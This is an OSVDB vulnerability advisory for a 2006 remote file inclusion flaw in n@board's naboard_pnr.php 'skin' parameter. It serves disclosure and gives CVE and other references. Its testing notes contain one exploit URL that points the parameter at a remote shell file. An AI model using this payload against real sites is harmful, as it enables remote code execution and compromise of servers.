n@board naboard_pnr.php skin Variable Remote File Inclusion

2006-10-12T06:04:07
ID OSVDB:29692
Type osvdb
Reporter OSVDB
Modified 2006-10-12T06:04:07

Description

Manual Testing Notes

http://[target]/[path]/naboard_pnr.php?skin=http://shell.txt?

References:

Vendor URL: http://navyism.com/naboard30e/ Secunia Advisory ID:22250 ISS X-Force ID: 29431 Generic Exploit URL: http://securitydot.net/txt/id/1645/type/xpl/ FrSIRT Advisory: ADV-2006-4013 CVE-2006-5281